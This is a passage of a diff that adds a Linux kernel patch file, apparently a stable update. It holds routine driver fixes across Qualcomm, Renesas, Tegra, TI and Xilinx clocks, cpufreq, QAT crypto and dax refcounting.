+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1054,7 +1054,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1082,7 +1082,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s0_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s0_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s0_clk_src = {
+@@ -1098,7 +1098,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s1_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s1_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s1_clk_src = {
+@@ -1114,7 +1114,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s2_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s2_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s2_clk_src = {
+@@ -1130,7 +1130,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s3_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s3_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s3_clk_src = {
+@@ -1146,7 +1146,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s4_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s4_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s4_clk_src = {
+@@ -1162,7 +1162,7 @@ static struct clk_init_data gcc_qupv3_wrap0_s5_clk_src_init = {
+ 	.name = "gcc_qupv3_wrap0_s5_clk_src",
+ 	.parent_data = gcc_parents_1,
+ 	.num_parents = ARRAY_SIZE(gcc_parents_1),
+-	.ops = &clk_rcg2_ops,
++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s5_clk_src = {
+@@ -1219,7 +1219,7 @@ static struct clk_rcg2 gcc_sdcc1_ice_core_clk_src = {
+ 		.name = "gcc_sdcc1_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1266,7 +1266,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1280,7 +1280,7 @@ static struct clk_rcg2 gcc_usb3_prim_phy_aux_clk_src = {
+ 		.name = "gcc_usb3_prim_phy_aux_clk_src",
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1303,7 +1303,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_14,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_14),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/mmcc-msm8974.c b/drivers/clk/qcom/mmcc-msm8974.c
+index f74662925a582..17ed52046170a 100644
+--- a/drivers/clk/qcom/mmcc-msm8974.c
++++ b/drivers/clk/qcom/mmcc-msm8974.c
+@@ -473,7 +473,7 @@ static struct clk_rcg2 mdp_clk_src = {
+ 		.name = "mdp_clk_src",
+ 		.parent_names = mmcc_xo_mmpll0_dsi_hdmi_gpll0,
+ 		.num_parents = 6,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -2192,23 +2192,6 @@ static struct clk_branch ocmemcx_ocmemnoc_clk = {
+ 	},
+ };
+ 
+-static struct clk_branch oxili_ocmemgx_clk = {
+-	.halt_reg = 0x402c,
+-	.clkr = {
+-		.enable_reg = 0x402c,
+-		.enable_mask = BIT(0),
+-		.hw.init = &(struct clk_init_data){
+-			.name = "oxili_ocmemgx_clk",
+-			.parent_names = (const char *[]){
+-				"gfx3d_clk_src",
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+-			.ops = &clk_branch2_ops,
+-		},
+-	},
+-};
+-
+ static struct clk_branch ocmemnoc_clk = {
+ 	.halt_reg = 0x50b4,
+ 	.clkr = {
+@@ -2389,7 +2372,7 @@ static struct gdsc mdss_gdsc = {
+ 	.pd = {
+ 		.name = "mdss",
+ 	},
+-	.pwrsts = PWRSTS_RET_ON,
++	.pwrsts = PWRSTS_OFF_ON,
+ };
+ 
+ static struct gdsc camss_jpeg_gdsc = {
+@@ -2500,7 +2483,6 @@ static struct clk_regmap *mmcc_msm8226_clocks[] = {
+ 	[MMSS_MMSSNOC_AXI_CLK] = &mmss_mmssnoc_axi_clk.clkr,
+ 	[MMSS_S0_AXI_CLK] = &mmss_s0_axi_clk.clkr,
+ 	[OCMEMCX_AHB_CLK] = &ocmemcx_ahb_clk.clkr,
+-	[OXILI_OCMEMGX_CLK] = &oxili_ocmemgx_clk.clkr,
+ 	[OXILI_GFX3D_CLK] = &oxili_gfx3d_clk.clkr,
+ 	[OXILICX_AHB_CLK] = &oxilicx_ahb_clk.clkr,
+ 	[OXILICX_AXI_CLK] = &oxilicx_axi_clk.clkr,
+@@ -2658,7 +2640,6 @@ static struct clk_regmap *mmcc_msm8974_clocks[] = {
+ 	[MMSS_S0_AXI_CLK] = &mmss_s0_axi_clk.clkr,
+ 	[OCMEMCX_AHB_CLK] = &ocmemcx_ahb_clk.clkr,
+ 	[OCMEMCX_OCMEMNOC_CLK] = &ocmemcx_ocmemnoc_clk.clkr,
+-	[OXILI_OCMEMGX_CLK] = &oxili_ocmemgx_clk.clkr,
+ 	[OCMEMNOC_CLK] = &ocmemnoc_clk.clkr,
+ 	[OXILI_GFX3D_CLK] = &oxili_gfx3d_clk.clkr,
+ 	[OXILICX_AHB_CLK] = &oxilicx_ahb_clk.clkr,
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index 2a16adb572d2b..0e914ec7aeae1 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -30,7 +30,7 @@ qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ 
+ 	rst = to_qcom_reset_controller(rcdev);
+ 	map = &rst->reset_map[id];
+-	mask = BIT(map->bit);
++	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+ 	return regmap_update_bits(rst->regmap, map->reg, mask, mask);
+ }
+@@ -44,7 +44,7 @@ qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
+ 
+ 	rst = to_qcom_reset_controller(rcdev);
+ 	map = &rst->reset_map[id];
+-	mask = BIT(map->bit);
++	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+ 	return regmap_update_bits(rst->regmap, map->reg, mask, 0);
+ }
+diff --git a/drivers/clk/qcom/reset.h b/drivers/clk/qcom/reset.h
+index b8c113582072b..9a47c838d9b1b 100644
+--- a/drivers/clk/qcom/reset.h
++++ b/drivers/clk/qcom/reset.h
+@@ -12,6 +12,7 @@ struct qcom_reset_map {
+ 	unsigned int reg;
+ 	u8 bit;
+ 	u8 udelay;
++	u32 bitmask;
+ };
+ 
+ struct regmap;
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 3ff6ecd617565..2c877576c5729 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -600,10 +600,8 @@ static int rzg2l_cpg_sipll5_set_rate(struct clk_hw *hw,
+ 	}
+ 
+ 	/* Output clock setting 1 */
+-	writel(CPG_SIPLL5_CLK1_POSTDIV1_WEN | CPG_SIPLL5_CLK1_POSTDIV2_WEN |
+-	       CPG_SIPLL5_CLK1_REFDIV_WEN  | (params.pl5_postdiv1 << 0) |
+-	       (params.pl5_postdiv2 << 4) | (params.pl5_refdiv << 8),
+-	       priv->base + CPG_SIPLL5_CLK1);
++	writel((params.pl5_postdiv1 << 0) | (params.pl5_postdiv2 << 4) |
++	       (params.pl5_refdiv << 8), priv->base + CPG_SIPLL5_CLK1);
+ 
+ 	/* Output clock setting, SSCG modulation value setting 3 */
+ 	writel((params.pl5_fracin << 8), priv->base + CPG_SIPLL5_CLK3);
+diff --git a/drivers/clk/renesas/rzg2l-cpg.h b/drivers/clk/renesas/rzg2l-cpg.h
+index cecbdf5e4f93a..b33a3e79161b6 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.h
++++ b/drivers/clk/renesas/rzg2l-cpg.h
+@@ -32,9 +32,6 @@
+ #define CPG_SIPLL5_STBY_RESETB_WEN	BIT(16)
+ #define CPG_SIPLL5_STBY_SSCG_EN_WEN	BIT(18)
+ #define CPG_SIPLL5_STBY_DOWNSPREAD_WEN	BIT(20)
+-#define CPG_SIPLL5_CLK1_POSTDIV1_WEN	BIT(16)
+-#define CPG_SIPLL5_CLK1_POSTDIV2_WEN	BIT(20)
+-#define CPG_SIPLL5_CLK1_REFDIV_WEN	BIT(24)
+ #define CPG_SIPLL5_CLK4_RESV_LSB	(0xFF)
+ #define CPG_SIPLL5_MON_PLL5_LOCK	BIT(4)
+ 
+diff --git a/drivers/clk/tegra/clk-tegra124-emc.c b/drivers/clk/tegra/clk-tegra124-emc.c
+index 219c80653dbdb..2a6db04342815 100644
+--- a/drivers/clk/tegra/clk-tegra124-emc.c
++++ b/drivers/clk/tegra/clk-tegra124-emc.c
+@@ -464,6 +464,7 @@ static int load_timings_from_dt(struct tegra_clk_emc *tegra,
+ 		err = load_one_timing_from_dt(tegra, timing, child);
+ 		if (err) {
+ 			of_node_put(child);
++			kfree(tegra->timings);
+ 			return err;
+ 		}
+ 
+@@ -515,6 +516,7 @@ struct clk *tegra124_clk_register_emc(void __iomem *base, struct device_node *np
+ 		err = load_timings_from_dt(tegra, node, node_ram_code);
+ 		if (err) {
+ 			of_node_put(node);
++			kfree(tegra);
+ 			return ERR_PTR(err);
+ 		}
+ 	}
+diff --git a/drivers/clk/ti/clkctrl.c b/drivers/clk/ti/clkctrl.c
+index ae58628794176..57611bfb299c1 100644
+--- a/drivers/clk/ti/clkctrl.c
++++ b/drivers/clk/ti/clkctrl.c
+@@ -258,6 +258,9 @@ static const char * __init clkctrl_get_clock_name(struct device_node *np,
+ 	if (clkctrl_name && !legacy_naming) {
+ 		clock_name = kasprintf(GFP_KERNEL, "%s-clkctrl:%04x:%d",
+ 				       clkctrl_name, offset, index);
++		if (!clock_name)
++			return NULL;
++
+ 		strreplace(clock_name, '_', '-');
+ 
+ 		return clock_name;
+@@ -586,6 +589,10 @@ static void __init _ti_omap4_clkctrl_setup(struct device_node *node)
+ 	if (clkctrl_name) {
+ 		provider->clkdm_name = kasprintf(GFP_KERNEL,
+ 						 "%s_clkdm", clkctrl_name);
++		if (!provider->clkdm_name) {
++			kfree(provider);
++			return;
++		}
+ 		goto clkdm_found;
+ 	}
+ 
+diff --git a/drivers/clk/xilinx/clk-xlnx-clock-wizard.c b/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
+index eb1dfe7ecc1b4..4a23583933bcc 100644
+--- a/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
++++ b/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
+@@ -354,7 +354,7 @@ static struct clk *clk_wzrd_register_divider(struct device *dev,
+ 	hw = &div->hw;
+ 	ret = devm_clk_hw_register(dev, hw);
+ 	if (ret)
+-		hw = ERR_PTR(ret);
++		return ERR_PTR(ret);
+ 
+ 	return hw->clk;
+ }
+diff --git a/drivers/clocksource/timer-cadence-ttc.c b/drivers/clocksource/timer-cadence-ttc.c
+index 4efd0cf3b602d..0d52e28fea4de 100644
+--- a/drivers/clocksource/timer-cadence-ttc.c
++++ b/drivers/clocksource/timer-cadence-ttc.c
+@@ -486,10 +486,10 @@ static int __init ttc_timer_probe(struct platform_device *pdev)
+ 	 * and use it. Note that the event timer uses the interrupt and it's the
+ 	 * 2nd TTC hence the irq_of_parse_and_map(,1)
+ 	 */
+-	timer_baseaddr = of_iomap(timer, 0);
+-	if (!timer_baseaddr) {
++	timer_baseaddr = devm_of_iomap(&pdev->dev, timer, 0, NULL);
++	if (IS_ERR(timer_baseaddr)) {
+ 		pr_err("ERROR: invalid timer base address\n");
+-		return -ENXIO;
++		return PTR_ERR(timer_baseaddr);
+ 	}
+ 
+ 	irq = irq_of_parse_and_map(timer, 1);
+@@ -513,20 +513,27 @@ static int __init ttc_timer_probe(struct platform_device *pdev)
+ 	clk_ce = of_clk_get(timer, clksel);
+ 	if (IS_ERR(clk_ce)) {
+ 		pr_err("ERROR: timer input clock not found\n");
+-		return PTR_ERR(clk_ce);
++		ret = PTR_ERR(clk_ce);
++		goto put_clk_cs;
+ 	}
+ 
+ 	ret = ttc_setup_clocksource(clk_cs, timer_baseaddr, timer_width);
+ 	if (ret)
+-		return ret;
++		goto put_clk_ce;
+ 
+ 	ret = ttc_setup_clockevent(clk_ce, timer_baseaddr + 4, irq);
+ 	if (ret)
+-		return ret;
++		goto put_clk_ce;
+ 
+ 	pr_info("%pOFn #0 at %p, irq=%d\n", timer, timer_baseaddr, irq);
+ 
+ 	return 0;
++
++put_clk_ce:
++	clk_put(clk_ce);
++put_clk_cs:
++	clk_put(clk_cs);
++	return ret;
+ }
+ 
+ static const struct of_device_id ttc_timer_of_match[] = {
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 6ff73c30769fa..818eb2503cdd5 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -837,6 +837,8 @@ static ssize_t store_energy_performance_preference(
+ 			err = cpufreq_start_governor(policy);
+ 			if (!ret)
+ 				ret = err;
++		} else {
++			ret = 0;
+ 		}
+ 	}
+ 
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 9a39a7ccfae96..fef68cb2b38f7 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -696,9 +696,16 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+-	.proc_max_volt = 1360000,
++	.proc_max_volt = 1350000,
+ 	.sram_min_volt = 0,
+-	.sram_max_volt = 1360000,
++	.sram_max_volt = 1350000,
++	.ccifreq_supported = false,
++};
++
++static const struct mtk_cpufreq_platform_data mt7623_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1300000,
+ 	.ccifreq_supported = false,
+ };
+ 
+@@ -734,7 +741,7 @@ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7623_platform_data },
+ 	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+diff --git a/drivers/crypto/marvell/cesa/cipher.c b/drivers/crypto/marvell/cesa/cipher.c
+index c6f2fa753b7c0..0f37dfd42d850 100644
+--- a/drivers/crypto/marvell/cesa/cipher.c
++++ b/drivers/crypto/marvell/cesa/cipher.c
+@@ -297,7 +297,7 @@ static int mv_cesa_des_setkey(struct crypto_skcipher *cipher, const u8 *key,
+ static int mv_cesa_des3_ede_setkey(struct crypto_skcipher *cipher,
+ 				   const u8 *key, unsigned int len)
+ {
+-	struct mv_cesa_des_ctx *ctx = crypto_skcipher_ctx(cipher);
++	struct mv_cesa_des3_ctx *ctx = crypto_skcipher_ctx(cipher);
+ 	int err;
+ 
+ 	err = verify_skcipher_des3_key(cipher, key);
+diff --git a/drivers/crypto/nx/Makefile b/drivers/crypto/nx/Makefile
+index d00181a26dd65..483cef62acee8 100644
+--- a/drivers/crypto/nx/Makefile
++++ b/drivers/crypto/nx/Makefile
+@@ -1,7 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ obj-$(CONFIG_CRYPTO_DEV_NX_ENCRYPT) += nx-crypto.o
+ nx-crypto-objs := nx.o \
+-		  nx_debugfs.o \
+ 		  nx-aes-cbc.o \
+ 		  nx-aes-ecb.o \
+ 		  nx-aes-gcm.o \
+@@ -11,6 +10,7 @@ nx-crypto-objs := nx.o \
+ 		  nx-sha256.o \
+ 		  nx-sha512.o
+ 
++nx-crypto-$(CONFIG_DEBUG_FS) += nx_debugfs.o
+ obj-$(CONFIG_CRYPTO_DEV_NX_COMPRESS_PSERIES) += nx-compress-pseries.o nx-compress.o
+ obj-$(CONFIG_CRYPTO_DEV_NX_COMPRESS_POWERNV) += nx-compress-powernv.o nx-compress.o
+ nx-compress-objs := nx-842.o
+diff --git a/drivers/crypto/nx/nx.h b/drivers/crypto/nx/nx.h
+index c6233173c612e..2697baebb6a35 100644
+--- a/drivers/crypto/nx/nx.h
++++ b/drivers/crypto/nx/nx.h
+@@ -170,8 +170,8 @@ struct nx_sg *nx_walk_and_build(struct nx_sg *, unsigned int,
+ void nx_debugfs_init(struct nx_crypto_driver *);
+ void nx_debugfs_fini(struct nx_crypto_driver *);
+ #else
+-#define NX_DEBUGFS_INIT(drv)	(0)
+-#define NX_DEBUGFS_FINI(drv)	(0)
++#define NX_DEBUGFS_INIT(drv)	do {} while (0)
++#define NX_DEBUGFS_FINI(drv)	do {} while (0)
+ #endif
+ 
+ #define NX_PAGE_NUM(x)		((u64)(x) & 0xfffffffffffff000ULL)
+diff --git a/drivers/crypto/qat/qat_common/qat_asym_algs.c b/drivers/crypto/qat/qat_common/qat_asym_algs.c
+index 94a26702aeae1..4128200a90329 100644
+--- a/drivers/crypto/qat/qat_common/qat_asym_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_asym_algs.c
+@@ -170,15 +170,14 @@ static void qat_dh_cb(struct icp_qat_fw_pke_resp *resp)
+ 	}
+ 
+ 	areq->dst_len = req->ctx.dh->p_size;
++	dma_unmap_single(dev, req->out.dh.r, req->ctx.dh->p_size,
++			 DMA_FROM_DEVICE);
+ 	if (req->dst_align) {
+ 		scatterwalk_map_and_copy(req->dst_align, areq->dst, 0,
+ 					 areq->dst_len, 1);
+ 		kfree_sensitive(req->dst_align);
+ 	}
+ 
+-	dma_unmap_single(dev, req->out.dh.r, req->ctx.dh->p_size,
+-			 DMA_FROM_DEVICE);
+-
+ 	dma_unmap_single(dev, req->phy_in, sizeof(struct qat_dh_input_params),
+ 			 DMA_TO_DEVICE);
+ 	dma_unmap_single(dev, req->phy_out,
+@@ -494,6 +493,8 @@ static int qat_dh_init_tfm(struct crypto_kpp *tfm)
+ 	if (!inst)
+ 		return -EINVAL;
+ 
++	kpp_set_reqsize(tfm, sizeof(struct qat_asym_request) + 64);
++
+ 	ctx->p_size = 0;
+ 	ctx->g2 = false;
+ 	ctx->inst = inst;
+@@ -519,12 +520,14 @@ static void qat_rsa_cb(struct icp_qat_fw_pke_resp *resp)
+ 
+ 	err = (err == ICP_QAT_FW_COMN_STATUS_FLAG_OK) ? 0 : -EINVAL;
+ 
+-	kfree_sensitive(req->src_align);
+-
+ 	dma_unmap_single(dev, req->in.rsa.enc.m, req->ctx.rsa->key_sz,
+ 			 DMA_TO_DEVICE);
+ 
++	kfree_sensitive(req->src_align);
++
+ 	areq->dst_len = req->ctx.rsa->key_sz;
++	dma_unmap_single(dev, req->out.rsa.enc.c, req->ctx.rsa->key_sz,
++			 DMA_FROM_DEVICE);
+ 	if (req->dst_align) {
+ 		scatterwalk_map_and_copy(req->dst_align, areq->dst, 0,
+ 					 areq->dst_len, 1);
+@@ -532,9 +535,6 @@ static void qat_rsa_cb(struct icp_qat_fw_pke_resp *resp)
+ 		kfree_sensitive(req->dst_align);
+ 	}
+ 
+-	dma_unmap_single(dev, req->out.rsa.enc.c, req->ctx.rsa->key_sz,
+-			 DMA_FROM_DEVICE);
+-
+ 	dma_unmap_single(dev, req->phy_in, sizeof(struct qat_rsa_input_params),
+ 			 DMA_TO_DEVICE);
+ 	dma_unmap_single(dev, req->phy_out,
+@@ -1230,6 +1230,8 @@ static int qat_rsa_init_tfm(struct crypto_akcipher *tfm)
+ 	if (!inst)
+ 		return -EINVAL;
+ 
++	akcipher_set_reqsize(tfm, sizeof(struct qat_asym_request) + 64);
++
+ 	ctx->key_sz = 0;
+ 	ctx->inst = inst;
+ 	return 0;
+@@ -1252,7 +1254,6 @@ static struct akcipher_alg rsa = {
+ 	.max_size = qat_rsa_max_size,
+ 	.init = qat_rsa_init_tfm,
+ 	.exit = qat_rsa_exit_tfm,
+-	.reqsize = sizeof(struct qat_asym_request) + 64,
+ 	.base = {
+ 		.cra_name = "rsa",
+ 		.cra_driver_name = "qat-rsa",
+@@ -1269,7 +1270,6 @@ static struct kpp_alg dh = {
+ 	.max_size = qat_dh_max_size,
+ 	.init = qat_dh_init_tfm,
+ 	.exit = qat_dh_exit_tfm,
+-	.reqsize = sizeof(struct qat_asym_request) + 64,
+ 	.base = {
+ 		.cra_name = "dh",
+ 		.cra_driver_name = "qat-dh",
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index c64e7076537cb..3a9348c7f7289 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -432,18 +432,34 @@ static void unregister_dev_dax(void *dev)
+ 	put_device(dev);
+ }
+ 
++static void dax_region_free(struct kref *kref)
++{
++	struct dax_region *dax_region;
++
++	dax_region = container_of(kref, struct dax_region, kref);
++	kfree(dax_region);
++}
++
++void dax_region_put(struct dax_region *dax_region)
++{
++	kref_put(&dax_region->kref, dax_region_free);
++}
++EXPORT_SYMBOL_GPL(dax_region_put);
++
+ /* a return value >= 0 indicates this invocation invalidated the id */
+ static int __free_dev_dax_id(struct dev_dax *dev_dax)
+ {
+-	struct dax_region *dax_region = dev_dax->region;
+ 	struct device *dev = &dev_dax->dev;
++	struct dax_region *dax_region;
+ 	int rc = dev_dax->id;
+ 
+ 	device_lock_assert(dev);
+ 
+-	if (is_static(dax_region) || dev_dax->id < 0)
++	if (!dev_dax->dyn_id || dev_dax->id < 0)
+ 		return -1;
++	dax_region = dev_dax->region;
+ 	ida_free(&dax_region->ida, dev_dax->id);
++	dax_region_put(dax_region);
+ 	dev_dax->id = -1;
+ 	return rc;
+ }
+@@ -459,6 +475,20 @@ static int free_dev_dax_id(struct dev_dax *dev_dax)
+ 	return rc;
+ }
+ 
++static int alloc_dev_dax_id(struct dev_dax *dev_dax)
++{
++	struct dax_region *dax_region = dev_dax->region;
++	int id;
++
++	id = ida_alloc(&dax_region->ida, GFP_KERNEL);
++	if (id < 0)
++		return id;
++	kref_get(&dax_region->kref);
++	dev_dax->dyn_id = true;
++	dev_dax->id = id;
++	return id;
++}
++
+ static ssize_t delete_store(struct device *dev, struct device_attribute *attr,
+ 		const char *buf, size_t len)
+ {
+@@ -546,20 +576,6 @@ static const struct attribute_group *dax_region_attribute_groups[] = {
+ 	NULL,
+ };
+ 
+-static void dax_region_free(struct kref *kref)
+-{
+-	struct dax_region *dax_region;
+-
+-	dax_region = container_of(kref, struct dax_region, kref);
+-	kfree(dax_region);
+-}
+-
+-void dax_region_put(struct dax_region *dax_region)
+-{
+-	kref_put(&dax_region->kref, dax_region_free);
+-}
+-EXPORT_SYMBOL_GPL(dax_region_put);
+-
+ static void dax_region_unregister(void *region)
+ {
+ 	struct dax_region *dax_region = region;
+@@ -621,10 +637,12 @@ EXPORT_SYMBOL_GPL(alloc_dax_region);
+ static void dax_mapping_release(struct device *dev)
+ {
+ 	struct dax_mapping *mapping = to_dax_mapping(dev);
+-	struct dev_dax *dev_dax = to_dev_dax(dev->parent);
++	struct device *parent = dev->parent;
++	struct dev_dax *dev_dax = to_dev_dax(parent);
+ 
+ 	ida_free(&dev_dax->ida, mapping->id);
+ 	kfree(mapping);
++	put_device(parent);
+ }
+ 
+ static void unregister_dax_mapping(void *data)
+@@ -764,6 +782,7 @@ static int devm_register_dax_mapping(struct dev_dax *dev_dax, int range_id)
+ 	dev = &mapping->dev;
+ 	device_initialize(dev);
+ 	dev->parent = &dev_dax->dev;
++	get_device(dev->parent);
+ 	dev->type = &dax_mapping_type;
+ 	dev_set_name(dev, "mapping%d", mapping->id);
+ 	rc = device_add(dev);
+@@ -1281,12 +1300,10 @@ static const struct attribute_group *dax_attribute_groups[] = {
+ static void dev_dax_release(struct device *dev)
+ {
+ 	struct dev_dax *dev_dax = to_dev_dax(dev);
+-	struct dax_region *dax_region = dev_dax->region;
+ 	struct dax_device *dax_dev = dev_dax->dax_dev;
+ 
+ 	put_dax(dax_dev);
+ 	free_dev_dax_id(dev_dax);
+-	dax_region_put(dax_region);
+ 	kfree(dev_dax->pgmap);
+ 	kfree(dev_dax);
+ }
+@@ -1310,6 +1327,7 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 	if (!dev_dax)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	dev_dax->region = dax_region;
+ 	if (is_static(dax_region)) {
+ 		if (dev_WARN_ONCE(parent, data->id < 0,
+ 				"dynamic id specified to static region\n")) {
+@@ -1325,13 +1343,11 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 			goto err_id;
+ 		}
+ 
+-		rc = ida_alloc(&dax_region->ida, GFP_KERNEL);
++		rc = alloc_dev_dax_id(dev_dax);
+ 		if (rc < 0)
+ 			goto err_id;
+-		dev_dax->id = rc;
+ 	}
+ 
+-	dev_dax->region = dax_region;
+ 	dev = &dev_dax->dev;
+ 	device_initialize(dev);
+ 	dev_set_name(dev, "dax%d.%d", dax_region->id, dev_dax->id);
+@@ -1372,7 +1388,6 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 	dev_dax->target_node = dax_region->target_node;
+ 	dev_dax->align = dax_region->align;
+ 	ida_init(&dev_dax->ida);
+-	kref_get(&dax_region->kref);
+ 
+ 	inode = dax_inode(dax_dev);
+ 	dev->devt = inode->i_rdev;
+diff --git a/drivers/dax/dax-private.h b/drivers/dax/dax-private.h
+index 1c974b7caae6e..afcada6fd2eda 100644
+--- a/drivers/dax/dax-private.h
++++ b/drivers/dax/dax-private.h
+@@ -52,7 +52,8 @@ struct dax_mapping {
+  * @region - parent region
+  * @dax_dev - core dax functionality
+  * @target_node: effective numa node if dev_dax memory range is onlined
+- * @id: ida allocated id
++ * @dyn_id: is this a dynamic or statically created instance
++ * @id: ida allocated id when the dax_region is not static
+  * @ida: mapping id allocator
+  * @dev - device core
+  * @pgmap - pgmap for memmap setup / lifetime (driver owned)
+@@ -64,6 +65,7 @@ struct dev_dax {
+ 	struct dax_device *dax_dev;
+ 	unsigned int align;
+ 	int target_node;
++	bool dyn_id;
+ 	int id;
+ 	struct ida ida;
+ 	struct device dev;
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4aa758a2b3d1b..1a33616ceb06e 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -99,7 +99,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 	if (!data->res_name)
+ 		goto err_res_name;
+ 
+-	rc = memory_group_register_static(numa_node, total_len);
++	rc = memory_group_register_static(numa_node, PFN_UP(total_len));
+ 	if (rc < 0)
+ 		goto err_reg_mgid;
+ 	data->mgid = rc;
+diff --git a/drivers/extcon/extcon-usbc-tusb320.c b/drivers/extcon/extcon-usbc-tusb320.c
+index 9dfa545427ca1..10dff1c512c41 100644
+--- a/drivers/extcon/extcon-usbc-tusb320.c
++++ b/drivers/extcon/extcon-usbc-tusb320.c
